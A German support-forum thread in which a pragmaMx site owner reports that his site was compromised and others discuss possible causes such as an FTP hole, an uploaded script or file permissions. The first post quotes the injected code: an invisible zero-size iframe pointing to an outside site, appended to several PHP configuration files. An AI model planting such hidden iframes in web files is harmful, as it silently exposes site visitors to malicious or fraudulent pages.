Suche

[pete]

Habe heute früh bemerkt, dass sich jemand an meiner Seite zu schaffen gemacht hat. Folgendes wurde verändert. Kann mir jemand sagen, woran das liegen könnte, dass der/die das geschafft hat?

modules\Bildergalerie\include\config.inc.php (18):?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
modules\Kalender\categories\german.php (31):?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
modules\Kalender\config\config.php (44):?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
modules\Kalender\config\configcolors.php (82):?><html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Es ist jeweils die Datei und welcher Eintrag gemacht wurde.

[pete]

 
EDIT: Es wurde immer die unlock.php verändert, sowie alle Dateien mit diesem iframe erweitert, die die Rechte 666 hatten

[Andi]

Hi

schwer zu sagen, wie das passiert ist.

Hast du Zugriff auf die Serverlogfiles aus diesem Zeitraum?
Irgendwelche Fremdmodule installiert, oder andere Scripte auf dem Server?

Wir hatten vor ner Weile das gleiche Problem, da lag es an einer Sicherheitslücke am FTP-Server. Also auch mal unbedingt beim Provider nachfragen...

[pete]

Den Provider hab ich schon mal angerufen und er wird nachsehen wie's passiert ist. Ich denke aber nicht, dass er die Schuld bei sich suchen wird bzw. wenn, auch nicht zugeben. Man kennt ja die gegenseitigen Schuldzuweisungen. Für ihn ist es Euer Script 
Fremdmodul hab ich nur das Flohmarkt-Modul, Scripte sonst keine am Laufen.

Ich kann's net sagen, bin nur a bisserl besserer Anwender Eures Scripts.

Ich hab mittlerweile alle Dateien auf 644 gestellt, die verändert wurden und werde diese in Zukunft nur mehr auf 666 setzen, wenn ich was ändere. Hab nicht gewusst, dass die unlock.php auch nur 644 sein muss. Hab das in der Vergangenheit so in Erinnerung, dass die Seite gar nicht gelaufen ist, wenn unlock.php nicht mind. 666 hatte. 

[Andi]

pragmaMx bringt keinerlei Scripte mit, mit denen es möglich wäre, andere Dateien auf dem Server zu editieren. Also müsste ein solches Script auf den Server hochgeladen worden sein. Die Module, die aktuell im pragmaMx enthalten sind oder von uns stammen, mit denen es möglich wäre Dateien hochzuladen, sind entsprechend angepasst, dass nur bestimmte Dateitypen von bestimmten Usern hochgeladen werden können. Und da sind Scriptdateien normalerweise nicht dabei.

Je nachdem wie php konfiguriert ist und wenn da wirklich ein Schadcript in deinem Webspace aktiv war, sind die chmods egal, weil die auch über das Script änderbar sein können.

Oki, warten wir mal ab, was der Provider findet.

[jubilee]

Die geänderte unlock.php hätte ich gerne gesehen/bekommen

[pete]

Hallo,

hab dir eine E-Mail geschickt. Ich weiß nicht, ob die richtige dabei ist. Hab nicht dran gedacht sie aufzubewahren. 

[Andi]

gerade gegoogelt:

http://www.phpbb2.de/fpost220346.html
http://www.joomlaportal.de/sicherheit/94478-joomla-seiten-gehackt-phpshell.html
http://forum.redaxo.de/ftopic5601-0.html
http://www.hackerboard.de/thread.php?postid=229909#post229909

[Andi]

gibt es da eigentlich was neues zu berichten?
Was sagt der Provider, immernoch pragmaMx schuld?

Hier noch ein interessanter Thread zu diesem Thema:
http://www.bot-trap.de/forum/index.php?topic=7212.0

[pete]

Hallo!

Ich hab ihn kontaktiert, nachdem er sich nicht gemeldet hat. Er mittlerweile davon Abstand genommen, dass es Euer Script wäre. Scheint eine PHP-Lücke zu sein. Näheres erfahre ich aber erst. Melde mich dann nochmal.